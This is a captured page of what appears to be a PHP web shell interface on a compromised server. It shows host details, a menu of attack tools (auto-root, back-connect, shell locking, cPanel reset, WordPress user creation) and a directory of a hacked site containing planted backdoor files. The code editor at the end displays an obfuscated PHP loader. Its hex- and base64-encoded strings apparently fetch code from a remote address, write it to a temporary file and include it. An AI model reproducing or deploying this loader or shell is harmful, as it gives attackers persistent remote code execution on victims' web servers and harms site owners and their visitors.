Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
promoace.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
2021
[ DIR ]
drwxr-xr-x
266e9
[ DIR ]
dr-xr-xr-x
3d73eb
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
mesdopapai
[ DIR ]
drwxr-xr-x
natal2020
[ DIR ]
drwxr-xr-x
natal2021
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
236
B
-r-xr-xr-x
44fd50
65
B
-r-xr-xr-x
Private-MASS-ova.php
19.06
KB
-rw-r--r--
_index.html
0
B
-rw-r--r--
admin.php
209
B
-rw-r--r--
buy.php
579
B
-rw-r--r--
documentroot.php
280
B
-rw-r--r--
e3c3ca
65
B
-r-xr-xr-x
favicon..png
15.75
KB
-rw-r--r--
favicon.ico
2.19
KB
-rw-r--r--
favicon_5.ico
2.19
KB
-rw-r--r--
goods.php
577
B
-rw-r--r--
index.php
7.18
KB
-r--r--r--
index.php0
7.18
KB
-rw-r--r--
item.php
2.03
KB
-r--r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
options.php
1.93
KB
-r--r--r--
plugins.php
1.87
KB
-r--r--r--
postnews.php
5.72
KB
-r--r--r--
robots.txt
440
B
-r--r--r--
search.php
1.44
KB
-r--r--r--
wp-esp.php
577
B
-rw-r--r--
wp-est.php
575
B
-rw-r--r--
wp-ompira.php
577
B
-rw-r--r--
x7.php
278
B
-rw-r--r--
xmlrpc.php.0
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modricZW9ITU.php
<?php $arr = array( "\x3D\x51\x44\x4D\x68\x56\x7A\x59\x6A\x4A\x57\x59\x6D\x56\x6A\x4D\x33\x63\x54\x59\x69\x46\x6A\x4D\x7A\x55\x54\x4E\x6B\x5A\x57\x4D\x35\x41\x7A\x4E\x6B\x4E\x32\x4D\x77\x55\x6A\x4D", // 0 "\x3D\x3D\x51\x5A\x73\x6C\x6D\x5A", // 1 "\x3D\x3D\x51\x5A\x73\x6C\x6D\x5A\x77\x31\x47\x64", // 2 "\x6C\x52\x58\x61\x79\x64\x6E\x5A", // 3 "\x53\x61\x6E\x74\x61\x69\x20\x44\x75\x6C\x75\x20\x47\x61\x6B\x20\x53\x69\x68", // 4 "\x3D\x45\x47\x64\x68\x52\x32\x58\x68\x52\x58\x5A\x74\x39\x46\x64\x6C\x64\x32\x58\x74\x46\x57\x5A\x79\x52\x33\x63", // 5 "\x6C\x4E\x33\x62\x73\x4E\x6D\x5A", // 6 "\x5A\x57\x52\x76\x59\x32\x56\x6B\x58\x7A\x51\x32\x5A\x58\x4E\x68\x59\x67\x3D\x3D", // 7 "\x42\x75\x73\x65\x74\x20\x6C\x75\x20\x62\x69\x73\x61\x20\x73\x61\x6E\x74\x61\x69\x20\x67\x61\x6B\x20\x73\x69\x68", // 8 "\x73\x74\x72\x72\x65\x76", // 9 "\x65\x64\x6F\x63\x65\x64\x5F\x34\x36\x65\x73\x61\x62", // 10 "\x6C\x78\x57\x61\x6D\x39\x46\x63\x74\x56\x47\x64", // 11 "\x6e\x42\x6e\x61\x75\x67\x6a\x4e\x6b\x4a\x44\x4e\x30\x63\x54\x4e\x7a\x45\x54\x4d\x77\x30\x43\x4f\x77\x4d\x54\x4f\x74\x45\x7a\x4e\x6d\x52\x54\x4c\x69\x5a\x44\x4f\x6a\x31\x53\x4f\x30\x59\x6d\x4d\x31\x67\x54\x5a\x78\x30\x53\x4f\x78\x63\x6a\x4e\x79\x6b\x54\x4f\x7a\x49\x7a\x4c\x32\x41\x54\x4d\x33\x4d\x54\x4d\x30\x4d\x54\x4d\x76\x30\x32\x62\x6a\x35\x43\x64\x75\x56\x47\x64\x75\x39\x32\x59\x79\x56\x32\x63\x31\x4a\x57\x64\x6f\x52\x58\x61\x6e\x35\x79\x63\x6c\x64\x57\x59\x74\x6c\x57\x4c\x79\x56\x32\x63\x31\x39\x79\x4c\x36\x4d\x48\x63\x30\x52\x48\x61", // 12 ); $uu = $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[1]))($arr[9]($arr[10])($arr[9]($arr[12]))); foreach($uu as $aww){ $awww = $arr[9]($arr[9]($arr[10])($arr[7]))($aww); } $password = ""; // programmers $temp_file = $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[2]))(); $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[3]))($GLOBALS[$arr[9]($arr[10])($arr[9]($arr[11]))], $awww); include $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[5]))($GLOBALS[$arr[9]($arr[10])($arr[9]($arr[11]))])['uri']; $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[6]))($GLOBALS[$arr[9]($arr[10])($arr[9]($arr[11]))]); unset($array);
Close